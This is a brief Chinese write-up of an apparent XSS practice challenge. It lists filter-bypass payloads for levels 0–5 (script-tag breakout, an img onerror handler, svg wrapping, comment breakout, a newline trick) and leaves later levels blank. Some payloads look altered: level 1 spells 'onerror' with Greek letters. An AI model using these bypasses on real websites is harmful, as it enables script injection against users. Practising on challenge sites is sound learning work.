经过了昨天的洗礼,今天换了个网站看一下
0、无过滤:"><script>prompt(1)</script>
1、过滤了</xxx>这种:<img οnerrοr=prompt(1) src=1 就行,没毛病
2、过滤[=(]:我们需要的括号用html编码搞定 <svg><script>prompt(1) </script>
3、->过滤为_:--!><script>prompt(1)</script>
4、
5、>|on.+?=|focus替换为_:type可以被我们覆盖掉,想的是直接改成img 然后onerror 可是没有等号前on.+?=|focus这顿操作让我们没法输入东西,但是我们有换行符
payload: " type=image src onerror
="prompt(1)
6、
7、
8、
9、
A、
B、
C、
D、
E、
F、